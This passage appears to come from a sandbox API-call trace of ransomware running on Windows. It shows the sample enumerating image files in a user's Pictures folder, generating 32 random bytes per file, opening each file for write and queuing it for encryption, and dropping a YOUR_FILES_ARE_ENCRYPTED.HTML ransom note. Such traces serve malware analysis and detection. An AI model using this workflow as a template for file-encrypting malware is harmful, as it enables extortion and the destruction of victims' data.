param_2="%02X" | out: param_1="2B") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="C2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="01") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="37") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="F2") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="AB") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="3B") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="F1") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="DA") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="4A") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="B2") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="96") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="3E") returned 2 [0168.651] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" [0168.651] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.651] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.655] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5210ff10, ftCreationTime.dwHighDateTime=0x1d7e222, ftLastAccessTime.dwLowDateTime=0xf30a3990, ftLastAccessTime.dwHighDateTime=0x1d7e29f, ftLastWriteTime.dwLowDateTime=0xf30a3990, ftLastWriteTime.dwHighDateTime=0x1d7e29f, nFileSizeHigh=0x0, nFileSizeLow=0xb80d, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="N1gRObBu2tnzgeva.bmp", cAlternateFileName="N1GROB~1.BMP")) returned 1 [0168.658] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\N1gRObBu2tnzgeva.bmp") returned 88 [0168.658] lstrcmpW (lpString1="N1gRObBu2tnzgeva.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.658] PathFindExtensionW (pszPath="N1gRObBu2tnzgeva.bmp") returned=".bmp" [0168.658] lstrlenW (lpString=".bmp") returned 4 [0168.658] PathFindExtensionW (pszPath="N1gRObBu2tnzgeva.bmp") returned=".bmp" [0168.658] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbbfdba0, ftCreationTime.dwHighDateTime=0x1d7e6d7, ftLastAccessTime.dwLowDateTime=0xb590c120, ftLastAccessTime.dwHighDateTime=0x1d7e758, ftLastWriteTime.dwLowDateTime=0xb590c120, ftLastWriteTime.dwHighDateTime=0x1d7e758, nFileSizeHigh=0x0, nFileSizeLow=0xf42f, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="tvjxlZJHorKt41fxL.jpg", cAlternateFileName="TVJXLZ~1.JPG")) returned 1 [0168.658] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg") returned 89 [0168.658] lstrcmpW (lpString1="tvjxlZJHorKt41fxL.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.659] PathFindExtensionW (pszPath="tvjxlZJHorKt41fxL.jpg") returned=".jpg" [0168.659] lstrlenW (lpString=".jpg") returned 4 [0168.659] PathFindExtensionW (pszPath="tvjxlZJHorKt41fxL.jpg") returned=".jpg" [0168.659] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\tvjxlzjhorkt41fxl.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.659] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=62511) returned 1 [0168.659] GetProcessHeap () returned 0x270000 [0168.659] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.660] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="AE") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="B6") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="D4") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="69") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="64") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="AF") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="18") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E8") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="69") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="87") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="A3") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="44") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="54") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="AF") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="4A") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="F7") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="88") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="F1") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="ED") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="C0") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="73") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C3") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="2B") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="01") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="04") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="C4") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="51") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="29") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="3B") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="C1") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="53") returned 2 [0168.661] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" [0168.661] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.661] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.671] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee9a2960, ftCreationTime.dwHighDateTime=0x1d7e67d, ftLastAccessTime.dwLowDateTime=0xdf5c40d0, ftLastAccessTime.dwHighDateTime=0x1d7e71a, ftLastWriteTime.dwLowDateTime=0xdf5c40d0, ftLastWriteTime.dwHighDateTime=0x1d7e71a, nFileSizeHigh=0x0, nFileSizeLow=0x12c4c, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="xYveXQ2BXsCwy5N1dYs.gif", cAlternateFileName="XYVEXQ~1.GIF")) returned 1 [0168.671] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif") returned 91 [0168.671] lstrcmpW (lpString1="xYveXQ2BXsCwy5N1dYs.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.671] PathFindExtensionW (pszPath="xYveXQ2BXsCwy5N1dYs.gif") returned=".gif" [0168.671] lstrlenW (lpString=".gif") returned 4 [0168.671] PathFindExtensionW (pszPath="xYveXQ2BXsCwy5N1dYs.gif") returned=".gif" [0168.671] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\xyvexq2bxscwy5n1dys.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.673] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=76876) returned 1 [0168.673] GetProcessHeap () returned 0x270000 [0168.673] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.673] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="A3") returned 2 [0168.673] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="C0") returned 2 [0168.673] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="F4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="67") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F1") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="D4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="59") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="D4") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="75") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="E1") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="80") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="3A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="44") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="99") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="2A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="CB") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="EA") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="36") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="3B") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="62") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="3D") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="3A") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="CF") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="A7") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="6E") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="DD") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="1B") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="8F") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="35") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="B6") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="CA") returned 2 [0168.674] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="5A") returned 2 [0168.675] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif" [0168.675] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.675] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.680] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee9a2960, ftCreationTime.dwHighDateTime=0x1d7e67d, ftLastAccessTime.dwLowDateTime=0xdf5c40d0, ftLastAccessTime.dwHighDateTime=0x1d7e71a, ftLastWriteTime.dwLowDateTime=0xdf5c40d0, ftLastWriteTime.dwHighDateTime=0x1d7e71a, nFileSizeHigh=0x0, nFileSizeLow=0x12c4c, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="xYveXQ2BXsCwy5N1dYs.gif", cAlternateFileName="XYVEXQ~1.GIF")) returned 0 [0168.682] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.683] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0168.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0168.683] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.685] CloseHandle (hObject=0x5b8) returned 1 [0168.685] GetProcessHeap () returned 0x270000 [0168.686] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.686] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779eccd0, ftCreationTime.dwHighDateTime=0x1d7d917, ftLastAccessTime.dwLowDateTime=0x5ffb9e10, ftLastAccessTime.dwHighDateTime=0x1d7e2c1, ftLastWriteTime.dwLowDateTime=0x5ffb9e10, ftLastWriteTime.dwHighDateTime=0x1d7e2c1, nFileSizeHigh=0x0, nFileSizeLow=0x66b9, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="nOmtcrLUjyQ.jpg", cAlternateFileName="NOMTCR~1.JPG")) returned 1 [0168.686] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg") returned 73 [0168.686] lstrcmpW (lpString1="nOmtcrLUjyQ.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.686] PathFindExtensionW (pszPath="nOmtcrLUjyQ.jpg") returned=".jpg" [0168.686] lstrlenW (lpString=".jpg") returned 4 [0168.686] PathFindExtensionW (pszPath="nOmtcrLUjyQ.jpg") returned=".jpg" [0168.686] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\nomtcrlujyq.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.687] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26297) returned 1 [0168.687] GetProcessHeap () returned 0x270000 [0168.687] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.688] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="38") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C5") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="93") returned 2 [0168.688] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EF") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="E5") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="E2") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9C") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="69") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="4B") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="39") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="32") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="AC") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="4E") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="E9") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="BD") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D6") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="CF") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D6") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A7") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="29") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="4A") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="D7") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C0") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F3") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="72") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="CE") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="73") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E0") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B9") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D3") returned 2 [0168.689] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="48") returned 2 [0168.690] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg" [0168.690] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.700] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c58de0, ftCreationTime.dwHighDateTime=0x1d7dbf7, ftLastAccessTime.dwLowDateTime=0xae55cd90, ftLastAccessTime.dwHighDateTime=0x1d7e124, ftLastWriteTime.dwLowDateTime=0xae55cd90, ftLastWriteTime.dwHighDateTime=0x1d7e124, nFileSizeHigh=0x0, nFileSizeLow=0x15944, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="P1x_px8M5Vpn6c.jpg", cAlternateFileName="P1X_PX~1.JPG")) returned 1 [0168.700] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg") returned 76 [0168.700] lstrcmpW (lpString1="P1x_px8M5Vpn6c.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.701] PathFindExtensionW (pszPath="P1x_px8M5Vpn6c.jpg") returned=".jpg" [0168.701] lstrlenW (lpString=".jpg") returned 4 [0168.701] PathFindExtensionW (pszPath="P1x_px8M5Vpn6c.jpg") returned=".jpg" [0168.701] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\p1x_px8m5vpn6c.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.701] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88388) returned 1 [0168.701] GetProcessHeap () returned 0x270000 [0168.701] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.702] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1A") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="66") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="52") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A3") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="94") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="28") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A4") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="65") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="BA") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3A") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="77") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="1C") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="C9") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="11") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B8") returned 2 [0168.702] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C7") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B4") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="BD") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="01") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="60") returned 2 [0168.703] wsprintfW (in: 